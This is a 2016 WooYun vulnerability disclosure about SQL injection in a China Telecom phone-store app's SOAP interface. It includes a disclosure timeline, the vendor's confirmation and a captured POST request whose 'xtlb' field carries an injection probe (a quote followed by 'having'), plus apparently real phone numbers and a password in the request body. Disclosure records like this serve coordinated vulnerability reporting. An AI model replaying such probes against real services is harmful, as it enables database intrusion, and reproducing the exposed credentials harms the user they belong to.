当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0190950

漏洞标题:中国电信某手机看店APP接口存在asmx注入漏洞(DBA权限)

相关厂商:中国电信某手机看店

漏洞作者: 0x 80

提交时间:2016-03-31 11:40

修复时间:2016-05-19 22:40

公开时间:2016-05-19 22:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-03-31: 细节已通知厂商并且等待厂商处理中
2016-04-04: 厂商已经确认,细节仅向厂商公开
2016-04-14: 细节向核心白帽子及相关领域专家公开
2016-04-24: 细节向普通白帽子公开
2016-05-04: 细节向实习白帽子公开
2016-05-19: 细节向公众公开

简要描述:

中国电信某手机看店APP接口存在asmx注入漏洞(DBA权限)
无聊玩一玩APP抓包测试

详细说明:

http://**.**.**.**/
下载APP
**.**.**.**:8011/HOMCAService.asmx

捕获97.GIF


QQ图片20160331031037.jpg


捕获98989.GIF


POST /HOMCAService.asmx HTTP/1.1
User-Agent: ksoap2-android/2.6.0+
SOAPAction: http://**.**.**.**/WriteWebService
Content-Type: text/xml;charset=utf-8
Connection: close
Accept-Encoding: gzip
Host: **.**.**.**:8011
Content-Length: 1204
<v:Envelope xmlns:i="http://**.**.**.**/2001/XMLSchema-instance" xmlns:d="http://**.**.**.**/2001/XMLSchema" xmlns:c="http://**.**.**.**/soap/encoding/" xmlns:v="http://**.**.**.**/soap/envelope/"><v:Header /><v:Body><WriteWebService xmlns="http://**.**.**.**/" id="o0" c:root="1"><jkid i:type="d:string">01W14</jkid><jkxlh i:type="d:string">1827C3A0E75A61AAFCCCFF380037C2B73932EBD59CCEA802F5F9F1B5ECBA1A3D</jkxlh><WriteXmlDoc i:type="d:string">&lt;?xml version="1.0" encoding="GBK"?&gt;&lt;root&gt;&lt;writeCondition&gt;&lt;action&gt;insert&lt;/action&gt;&lt;usercelid&gt;K15882008953&lt;/usercelid&gt;&lt;password&gt;7788250&lt;/password&gt;&lt;username&gt;K15882008953&lt;/username&gt;&lt;hashcode&gt;FEE13674CC4A9F6E4117273A1782E0F7&lt;/hashcode&gt;&lt;agentid&gt;9998&lt;/agentid&gt;&lt;idtype&gt;3&lt;/idtype&gt;&lt;accountype&gt;1&lt;/accountype&gt;&lt;status&gt;1&lt;/status&gt;&lt;logintype&gt;0&lt;/logintype&gt;&lt;warningcelno&gt;15882008953&lt;/warningcelno&gt;&lt;dynamiccode&gt;617592&lt;/dynamiccode&gt;&lt;activecodetype&gt;2&lt;/activecodetype&gt;&lt;/writeCondition&gt;&lt;/root&gt;</WriteXmlDoc><xtlb i:type="d:string">'having</xtlb></WriteWebService></v:Body></v:Envelope>


存在注入漏洞

捕获9.GIF


捕获989898.GIF


捕获91.GIF


漏洞证明:

**.**.**.**:8011/HOMCAService.asmx

修复方案:

版权声明:转载请注明来源 0x 80@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-04-04 22:36

厂商回复:

CNVD确认所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理部门处置。

最新状态:

暂无